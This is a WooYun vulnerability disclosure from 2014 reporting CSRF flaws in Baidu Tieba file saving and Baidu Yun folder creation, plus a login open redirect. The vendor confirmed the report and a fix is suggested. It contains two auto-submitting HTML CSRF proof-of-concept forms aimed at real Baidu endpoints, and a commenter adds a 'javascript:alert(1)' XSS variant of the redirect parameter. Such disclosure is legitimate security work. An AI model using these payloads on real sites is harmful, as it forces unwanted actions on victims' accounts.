当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047868

漏洞标题:百度贴吧多处CSRF漏洞及url跳转

相关厂商:百度

漏洞作者: q601333824

提交时间:2014-01-06 15:38

修复时间:2014-02-20 15:39

公开时间:2014-02-20 15:39

漏洞类型:CSRF

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-06: 细节已通知厂商并且等待厂商处理中
2014-01-07: 厂商已经确认,细节仅向厂商公开
2014-01-17: 细节向核心白帽子及相关领域专家公开
2014-01-27: 细节向普通白帽子公开
2014-02-06: 细节向实习白帽子公开
2014-02-20: 细节向公众公开

简要描述:

百度贴吧CSRF漏洞+百度云盘CSRF漏洞+百度贴吧登录触发鸡肋URL跳转....打包了

详细说明:


1.百度贴吧发一个文件帖子,其中转存文件功能没有加token,没有对来源验证,存在CSRF漏洞(注:转存功能要别人才能看见,自己看见的是前往云盘,所以要另一个号查看),如图

1.png


3.png


2.转存文件接口:http://tieba.baidu.com/data/filepost
访问以下页面,即可转存文件 (注;下面的参数是我截获我发的文件请求,不能修改,别的文件要另外发帖才行,另外转存功能对自己不会转存,但是别人访问就会转存)

<html>
<body>
<form id="csrf" name="csrf" action="http://tieba.baidu.com/data/filepost" method="POST">
<input type="text" name="dst_path" value="/client.txd" />
  <input type="text" name="method" value="archiveFile" />
  <input type="text" name="src_path" value="/apps/tieba/client.txd" />
 <input type="text" name="src_uk" value="1931405923" />
<input type="submit" value="submit" />
</form>
<script>
	document.csrf.submit();
</script>
</body>
</html>


3.在提交的参数中&src_uk=1931405923参数大概就是对应的文件号.如图

2.png


4.然后小号访问连接,就成功转存文件.如图

4.png


5.png


--------------------------------------------------------------------------------
1.百度云盘创建文件夹的功能,没有加token,没有对来源验证.存在CSRF漏洞
创建文件夹接口:http://yun.baidu.com/api/create
访问以下页面,即可创建文件夹

<html>
<body>
<form id="csrf" name="csrf" action="http://yun.baidu.com/api/create" method="POST">
  <input type="text" name="path" value="55555555555555555555555555555555555555555" />
<input type="text" name="isdir" value="1" />
<input type="text" name="size" value="1" />
<input type="text" name="block_list" value="[]" />
 <input type="text" name="method" value="post" />
</form>
<script>
	document.csrf.submit();
</script>
</body>
</html>


2.当小号访问之后,就创建了5555555..文件夹了,如图

QQ截图20140104153754.png


QQ截图20140104153807.png


------------------------------------------------------------------------------------
1.百度贴吧鸡肋的URL跳转,这个页面大概是最近新出的功能(第一次提交URL跳转漏洞不知道对不对)
URL跳转接口:http://tieba.baidu.com/f/user/passport?jumpUrl=http://www.qq.com/
(注:这个页面是百度贴吧登录接口,登录帐号之后才会跳转,鸡肋的地方就是不能用快速登录,要手动输入帐号密码登录)
如图:
(1)手动输入帐号密码登录贴吧,登录贴吧之后就会跳转到腾讯QQ官网

333.png


(2)登录之后跳转到腾讯QQ官网

aaaaaaaaaaaaa.png


漏洞证明:

1.png


3.png


2.png


4.png


5.png


QQ截图20140104153754.png


QQ截图20140104153807.png


333.png


(2)登录之后跳转到腾讯QQ官网

aaaaaaaaaaaaa.png


修复方案:

加上token,对来源验证,URL跳转验证

版权声明:转载请注明来源 q601333824@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2014-01-07 12:03

厂商回复:

感谢提交,我们立即联系业务部门处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-01-09 21:45 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    30QB!壕做友

  2. 2014-01-09 22:02 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    @233 上次存WB的换QB,这次存的WB换书想看下=_=,想找别的,感觉csrf找出来不值钱

  3. 2014-01-09 22:05 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    @q601333824 看书头就晕(⊙o⊙)…

  4. 2014-02-06 13:09 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    http://tieba.baidu.com/f/user/passport?jumpUrl=javascript:alert(1)2333333这玩意还没修复

  5. 2014-02-06 20:32 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    @dtc 还是你牛B,原来这样也能弹....... =_=

  6. 2014-02-07 17:49 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    @q601333824 噗。。我也是白,去玩玩zone里的xss挑战不?那个挺难的。。

  7. 2014-02-08 22:30 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    @dtc .....感觉都很难,我就只会拿着代码到处xx看,运气好X出问题了......=_=

  8. 2014-09-23 11:59 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    @q601333824 要啥书我给你买,给我xss学习。我的洞都是20rank的。不差钱

  9. 2014-09-24 03:01 | q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)

    @老和尚 已经买了....XSS我也是碰运气,就是看见输入框就代码××看,然后去找输出点

  10. 2014-09-24 08:04 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    @q601333824 xss的宗旨就是抓住任何一个输入框~

  11. 2015-04-25 01:15 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    洞主你要把百度贴吧所有的csrf承包了啊